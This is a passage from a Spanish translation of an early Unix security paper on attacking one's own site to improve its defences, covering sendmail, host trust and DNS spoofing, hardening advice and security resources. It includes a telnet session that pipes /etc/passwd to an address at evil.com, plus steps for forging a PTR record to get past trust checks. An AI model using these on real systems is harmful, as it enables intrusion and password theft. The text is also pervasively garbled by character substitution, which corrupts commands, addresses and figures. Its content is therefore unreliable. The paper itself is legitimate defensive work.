plotar los !ugs de algunas versiones. 'omo en muchos !ugs de *&IF, casi todas las distri!uciones de sendmail eran vulnera!les al pro!lema, ya que todas compartian un ancestral codigo fuente comun. El espacio nos impide discutirlo en su totalidad, pero un tipico ataque para conseguir el fichero de pass"ords seria de la siguiente maneraI evil O telnet victim.com UX Trying GUT.GUT.GUT.G... 'onnected to victim.com Escape character is e]Re. UU6 victim.com %endmail X.XX ready at %aturday, 7 &ov MN GTI65 mail fromI W_D!inDmail zenPevil.com ` DetcDpass"dW UX6 W_D!inDmail zenPevil.com ` DetcDpass"dW... %ender o, rcpt toI nosuchuser XX6 nosuchuser... *ser un,no"n data NX5 Enter mail, end "ith W.W on a line !y itself . UX6 )ail accepted quit 'onnection closed !y foreign host. evil O )ientras escri!iamos esto, se informa que la version T.7.5 de sendmail -ver apendice E para informacion so!re como conseguirlo/ es la unica variante del sendmail con todos los !ugs recientes corregidos -ni de coCa =/.

G6
'onfianza #ara nuestro ultimo topico de vulnera!ilidad, nos desviaremos de la estrategia practica que hemos seguido previamente para meternos un poco mas en la parte teorica, y discutir !revemente la nocion de la confianza. 4as cuestiones e implicaciones de la vulnera!ilidad aqu, son un poco mas sutiles y le1anas de alcanzar que las que hemos apuntado anteriormente; en el conte to de este te to usamos la pala!ra confianza siempre que se da la situacion de que un servidor -siempre que un host permite acceso remoto se le puede llamar servidor/ permita que un recurso local sea usado por un cliente sin autentificacion de pass"ord cuando dicha autentificacion es normalmente requerida. En otras pala!ras, limitamos ar!itrariamente la discusion a los clientes :disfrazados;. 9ay muchas maneras de un host pueda confiarI los ficheros .rhosts y hosts.equiv que permiten el acceso sin verificacion de pass"ord; ervidores !asados en ventanas que permiten a los sistemas remotos el uso y a!uso de privilegios; archivos e portados que controlan el acceso via &H%, y mas. 'asi todos estos dependen de la conversion del I# del cliente al nom!re del host para determinar si se concede el servicio o no. El metodo mas simple usa el archivo DetcDhosts para una !usqueda directa. %in em!argo, hoy en dia la mayoria de hosts usan o !ien E&% -Eomain &ame %ervice/, &I%, o am!os para el servicio de !usqueda del nom!re. *na !usqueda inversa ocurre cuando un servidor tiene una direccion I# -de una cone in de un cliente/ y desea coger el correspondiente nom!re del host del cliente. (uqnue el concepto de como funciona la confianza del host es !ien sa!ido por muchos administradores de sistema, los peligros de la confianza, y el pro!lema practico que representa, sin tomar en consideracion la interpretacion del nom!re del host, es uno de los pro!lemas menos entendidos que conocemos en Internet. Esto va mas alla de los o!vios ficheros hosts.equiv y .rhosts; &H%, &I%, sistemas de ventanas ? de hecho, muchos de los utiles servicios en *&IF estan !asados en el concepto de que sites !ien conocidos -para un administrador o ususario/ son de alguna manera de confianza. 4o que no se entiende es como las redes atan de forma tan estrecha la seguridad entre lo que normalmente se consideran hosts incone os. 'ualquier forma de confianza puede ser engaCada, !urlada, o derri!ada, especialmente cuando la autoridad que tiene la responsa!ilidad de chequear los credenciales de un cliente esta o !ien fuera del dominio administrativo del servidor, o cuendo el mecanismo de confianza esta !asado de alguna forma en metodo que tiene una forma de!il de autentificacion; normalmente am!os son el caso. A!viamente, si el host que contiene la !ase de datos -!ien &I%, E&%, o o lo que sea/ ha sido comprometido, el intruso puede convencer al host victima de que el viene de cualquier host de confianza; ahora es suficiente con encontrar que hosts son de confianza para la victima. Esta tarea es en gran medida facilitada e aminado de donde los administradores de sistema y las cuentas del sistema -tales como root, etc./ se conectaron por ultima vez. Bolviendo a nuestra victima, victim.com, puedes ver que la cuenta root asi como otras cuentas del sistema se conectaron desde !ig.victim.com. 'am!ias el registro #T$ para evil.com de forma que cuando intentes hacern rlogin -login remoto/ desde evil.com a victim.com, evil.com intentara !uscar tu nom!re de host y encontrara lo que pusistesenel registro. %i el registro en la !ase de datos E&% es asiI G.GMU.GMU.GMU.in@addr.arpa y lo cam!ias porI G.GMU.GMU.GMU.in@addr.arpa I& #T$ !ig.victim.com I& #T$ evil.com

entonces, dependiendo de como sea de ingenuo el soft"are de victim.com, victim.com creera que el acceso proviene de !ig.victim.com, y, asumiendo que !ig.victim.com este en los ficheros DetcDhosts.equiv o D.rhosts, te sera posi!le aceder sin tener que proporcionar un pass"ord. 'on &I%, es cuestion de o !ien editar la !ase de datos del host en el &I% maestro -si es que este esta controlado por el intruso/ o de !urlar o forzar el &I% -ver discusion so!re la seguridad del &I% arri!a/ para proporcionar a la victima cualquier informacion que desees. (unque mas comple1os, daCinos e interesantes ataques pueden ser realizados por medio del E&%, el tiempo y el espacio no permiten cu!rir dichos metodos aqu. Eos metodos puedem ser usados para prevenir dichos ataques. El primero es el mas directo, pero quizas mas poco practico. %i tu site no usa ningun metodo de confianza, no seras tan vulnera!le al engaCo de host. 4a otra estrategia es la de usar protocolos encriptados. El usar el seguro protocolo $#' -usado en &H%, &I%\, seguros/ es un metodo; aunque ha sido :roto; criptograficamente, aun da mas seguridad que los procedimientos de autentificacion $#' que no usan ningun tipo de metodo de encriptacion. Atras soluciones, tanto de hard"are -smartcards/ como de soft"are -aer!eros/, estan siendo desarroladas, pero estan o !ien incompletas o requieren cam!ios en el soft"are de el sistema. El apendice + detalla los resultados de un estudio informal tomado de una variedad de hosts en Internet. protegiendo el sistema Es nuestra esperanza el que hallamos demostrado que incluso algunos de los aparentemente inocuos servicios ofrecidos -algunas veces inesperadamente/ pueden ser :municion; para determinados crac,ers de sistemas. #ero, por supuesto, si la seguridad fuera nuestra unica

GG
preocupacion, los ordenadores 1amas estarian encendidos, y enganchados a una red con literalmente millones de intrusos en potencia. )as que dar avisos de que de!eria o no ncenderse, ofreceremos algunas sugerencias generalesI %i no puedes quitar el servicio finger, considera el instalar un nuevo finger daemon. Es raramente necesario el revelar el home directory de un usuario y la procedencia de su ultimo acceso. &o corras &I% a menos que sea a!solutamente necesario. *salo lo menos posi!le. =amas e portes sistemas de archivo &H% sin restriccion, a todo el mundo. Trata de e portar sistemas de archivos de solo lectura cuando sea posi!le. :Hortifica; y protege los servidores -e1, los hosts que dan un servicio a otros hosts ? &H%, &I%, E&%, o lo que sea./. %olo permite cuentas administrativas en dichos hosts. E amina cuidadosamente los servicios ofrecidos por inetd y el mapeador de puertos -pormapper/. Elimina todos aquellos que no sean totalmente necesarios. *sa los inetd "rappers de Jietse Benema, no para otra funcion que la de tener un log de las fuentes de cone iones a tu host. Esto aporta grandes me1oras a las caracteristicas de verificacion standard de *&IF, especialmente con referencia a los ataques de red. %i es posi!le, usa los metodos loghost de syslog para o!tener informacion relacionada con la seguridad en un host seguro. Elimina los metodos de confianza a menos que su uso sea totalmente necesario. 4a confianza es tu enemigo. *sa pass"ords shado"ed y el comando pass"d para rechazar pass"ords po!res, de!iles. Eesa!ilita cuentas de usuario o de sistema no usadas o inactivas. Estate al tanto de la literatura actual -o!serva la lista de lectura y !i!liografua sugerida al final de este documento/ y de las herramientas de seguridad; informa a los demas acerca de pro!lemas e incidentes de seguridad. 'omo minimo, suscri!ete a la lista de mail del 'E$T y de la revista #9$('a -ademas de la lista de mail de los fire"alls, si tu site esta usando o piensa instalar fire"alls/ y lee los grupos de ne"s de usenet acerca de seguridad para asi o!tener la ultima informacion so!re pro!lemas de seguridad. 4a ignorancia es el pro!lema de seguridad mas mortal de los que estamos al tanto. Instala todos los parches de seguridad tan pronto como sea posi!le, en todos tus hosts. E amina la informacion de los parches de seguridad de otras distri!uciones ? muchos !ugs -rdist, sendmail/ son comunes en muchas variantes *&IF. Es interesante el ver que soluciones comunes para pro!lemas de seguridad , tales como usar aer!eros o el usar pass"ords de usar y tirar o to,ens digitales no son efectivas contra muchos de los ataques discutidos aqu. $ecomendamos de verdad el uso de tales sistemas, pero alertamos que no son la solucion TAT(4 a los pro!lemas de seguridad ? son parte de un esfuerzo ayor de proteger tu sistema. 'onclusiones Tal vez ninguno de los metodos e puestos aqu sean sorprendentes; cuando se escri!io este documento, no aprendimos mucho so!re como irrumpir en sistemas. 4o que aprendimos fue, testeando estos metodos en nuestros propios sistemas y en sites amigos, lo efectivos que son estos metodos a la hora de ganar acceso a un tipico host *ni de Internet. 'ansado de tratar de teclear todo esto a mano, y deseando mantener nuestros propios sistemas mas seguros, decidimos poner en practica una herramienta de seguridad -%(T(&/ que trata de chequear hosts remotos al menos para alguno de los pro!lemas discutidos aqu. 4a tipica respuesta, cuando informa!amos a la gente acerca de nuestro documento y nuestra herramienta, era algo del estilo de :eso suena !astante peligroso ? espero que no vayas a darlo a todo cristo. #ero ya que tu confias en mi, podria tener una copia2; =amas pensamos en crear un coo,!oo, o una herramienta de metodos y programas soo!reDpara irrumpir en sistemas ? en vez de eso, vemos que estos mismos metodos fueron usados, todos los dias, contra nosotros y contra administradores de sistema amigos. 'reemos que el propagar la informacion que normalmente no era accesi!le para aquellos que estuvieran fuera del under"orld, podemos aumentar la seguridad incrementando la conciancia del peligro.. El intentar restringir el acceso a informacion :peligrosa; so!re seguridad nunca ha sido un metodo muy util para incrementar la seguridad; de hecho, lo contrario parece ser el caso, ya que los crac,ers de sistemas han sido reticentes a la hora de compartir informacion con otros. )ientras es casi seguro que alguna de la informacion aqu presentada es material nuevo para aspirantes a crac,ers de sistemas, y que algunos la usaran para ganarse accesos no autorizados en hosts, la evidencia presentada por nuestros tests muestra que hay un monton de sites inseguros, simplemente por que el administrador de sistema no sa!e mucho mas ? no son estupidos o lentos, simplemente no son capaces de pasar el poco tiempo que tienen li!re e plorando todas las materias de seguridad pertenecientes a sus sistemas. 'om!inado esto con el hecho de que no tienen un acceso facil a este tipo de informacion da como resultado sistemas po!remente defendidos.

GU
Esperamos -modetamente/ que este documento provea de datos muy necesarios so!re como los sistemas son crac,eados, y mas aun, e plique por que se de!en de dar ciertos pasos para proteger un sistema. El sa!er por que algo es un pro!lema es, en nuestra opinion, la clave para aprender y hacer una eleccion informada e inteleginte para lo que la seguridad de tu sistema significa de verdad. @@@@@ (pendice (I %(T(& -%ecurity (nalysis Tool for (uditing &et"or,s/ 'once!ido originalmente hace unos aCos, %(T(& es actualmente el prototipo de una vision mas amplia y comprensi!le de una herramineta de seguridad. En su encarnacion actual, %(T(& prue!a e informa remotamente acerca de varios !ugs y de!ilidades en servicios de red y sistemas !asados en ventanas, asi como tam!ien detalla tanta informacion util so!re la victima como le es posi!le. Entonces procesa los datos con un filtro y con lo que se calificaria como un sistema e perto para al final generar el analisis de seguridad. ( pesar de no ser particularmente rapido, es e tremadamente adapta!le y facil de modificar. %(T(& consiste en varios su!@programas, cada uno de los cuales es un fichero e1ecuta!le -perl, shell, !inario compilado en ', lo que sea/ que testea un host para una de!ilidad potencial dada. El aCadir futuros programas de testeo es tan facil como poner un e1ecuta!le en el directorio principal con la e tension :.sat;; el programa principal lo e1ecutara automaticamente. Este genera una serie de !lancos -usando E&% y una version rapida de ping a la vez para llegar a los !lancos en directo/, y despues e1ecuta cada uno de los programas so!re cada uno de los !lancos. *n programa de interpretacionDfiltrado de datos analiza despues el resultado, y finalmente un programa de informes digiere todo para ponerlo en un formato mas lei!le. El paquete entero, incluyendo el codigo fuente y la documentacion, estara disponi!le li!remente al pu!lico, via ftp anonimo y postenadolo a uno de los numerosos foros so!re codigo fuente de *senet. (pendice + *n estudio informal llevado a ca!o en al menos una docena de sites en Internet -educacionales, militares, y comerciales, con unos U66 hosts y 5666 cuentas/ revelo que como media, alrededor del G6O de las cuentas de un site tenian archivos .rhosts. 'ada uno de estos archivos promedia!a 7 hosts confiados; sin em!argo, no era raro el tener unas G66 entradas en el archivo .rhosts de una cuenta, y en algunas ocasiones, esta cifra esta!a alrededor de X66V -Este no es un record del que uno de!eria estar orgulloso de poseer/. (dicionalmente, cada uno de los sites directamente en Internet -un site esta!a practicamente tras un fire"all/ confia!a en un usuario o host en otro site ? asi que, la seguridad del site no esta!a !a1o el control directo del administrador de sistema. 4os sites mas grandes, con mas usuarios y hosts, tenian un porcenta1e mas !a1o de usuarios con archivos .rhosts, pero el tamaCo de estos archivos era mayor, asi como el numero de hosts remotos de confianza. (unque fue muy dificil el verificar cuantas de las entradas fueron validas, con nom!res de host tales como W)a,efileW, W)essage@IdIW, and W]'s](]'])]'i]'])p&u]4]j]AW, asi como unas pocas entradas de "ildcard, nos cuestionamos la sensatez de poner la seguridad de un site en manos de sus usuarios. )uchos usuarios -especialmente los poseedores de largos archivos .rhosts/ intentaron poner comentarios tipo shell en sus archivos .rhosts, que son intentados reolver como nom!re de host validos por muchos sistemas *&IF. Eesafortunadamente, un atacante puede entonces usar las tecnicas E&% y &I% de engaCo del nom!re de host discutidas antes para fi1ar sus nom!res de host como WZW y entrar li!remente. Esto pone en riesgo a muchos sites -al menos una distri!ucion es dada con comentarios en sus archivos DetcDhosts.equiv/. #odrias pensar que estos sites no son tipicos, y, de hecho, no lo eran. Birtualmente todos los administradores sa!en un monton so!re seguridad y escri!en programas de seguridad como ho!!y o como profesion, y muchos de los sites para los que tra!a1aron hicieron estudios de seguridad o crearon roductos de seguridad. %olo podemos suponernos como sera un site :tipico;.apendice 'I Eespues de reci!ir mail de un site que ha!ia sido violado desde uno de nuestros sistemas, se inicio una investigacion. 'on el tiempo, encontramos que el intruso esta!a haciendolo desde una lista de sites :.com; -comerciales/, !uscando hosts con ficheros de pass"ord faciles de ro!ar. En este caso, :facil de ro!ar; se refiere a sites con un no!re de dominio &I% facil de adivinar y un servidor &I% de facil acceso. %in sa!er cuan le1os ha!ia llegado el intruso, parecia una !uena idea el alertar a los sites que eran en si vulnera!les al ro!o de pass"ords. Ee los 7X7 hosts de la lista del intruso, U5 tenian archivos de pass"ord suscepti!les de ro!o ? G de cada UX hosts mas o menosVV. *n tercio de estos archivos contenia al menos una cuenta sin pass"ord con shell interactivo. 'on un total de GXM5 entradas, a una media de G6 minutos corriendo un pass"ord crac,er -'rac,/ daria mas de X6 pass"ords, usando una estacion de tra!a1o %un de gama !a1a.Atros 56 mas se encontaron en los siguientes U6 minutos; y un pass"ord de la cuenta root se encontro en solo G hora. El resultado despues de unos dias de crac,eo fueI X pass"ords root, GM de U5 archivos de pass"ord -T6O/ con al menos un pass"ord conocido, y UXM de GXM5 -G se to/ pass"ords adivinados. (pendice EI 'omo conseguir metodos de seguridad gratis en Internet

GN
4istas de mailI o The 'E$T -'omputer Emergency $esponse Team/ advisory mailing list. )andar e@mail a certPcert.org, y pedir que se te ponga en su lista de mail. o The #hrac, ne"sletter. )andar e@mail a phrac,P"ell.sf.ca.us y pedir que se te aCada en la lista. o The Hire"alls mailing list. ma1ordomoPgreatcircle.com #oner lo siguienteI su!scri!e fire"alls o 'omputer *nderground Eigest. )andar e@mail a t,61utUPmvs.cso.niu.edu, pidiendo que te pongan en la lista. %oft"are gratisI 'A#% -'omputer Aracle and #ass"ord %ystem/ disponi!le via ftp anonimo fde archive.cis.ohio@state.edu, in pu!DcopsDG.65\. The tcp "rappers disponi!les via ftp anonimo de ftp."in.tue.nl, in pu!Dsecurity. 'rac, esta disponi!le en ftp.uu.net, in DusenetDcomp.sources.miscDvolumeUT. T()* is a *&IF auditing tool that is part of a larger suite of e cellent tools put out !y a group at the Te as (8) *niversity. They can !e gotten via anonymous ftp at net.tamu.edu, in pu!DsecurityDT()*. %ources for ftpd and many other net"or, utilities can !e found in ftp.uu.net, in pac,agesD!sd@sources. %ource for I%% -Internet %ecurity %canner/, a tool that remotely scans for various net"or, vulnera!ilities, is availa!le via anonymous ftp from ftp.uu.net, in usenetDcomp.sources.miscDvolume56Diss. %ecureli! is availa!le via anonymous ftp from ftp.uu.net, in usenetDcomp.sources.miscDvolumeN7Dsecureli!. The latest version of !er,eley sendmail is availa!le via anonymous ftp from ftp.cs.!er,eley.edu, in uc!Dsendmail. Trip"ire, a *&IF filesystem integrity chec,er\, is availa!le via anonymous ftp at ftp.cs.purdue.edu, in pu!DspafD'A(%TDTrip"ire.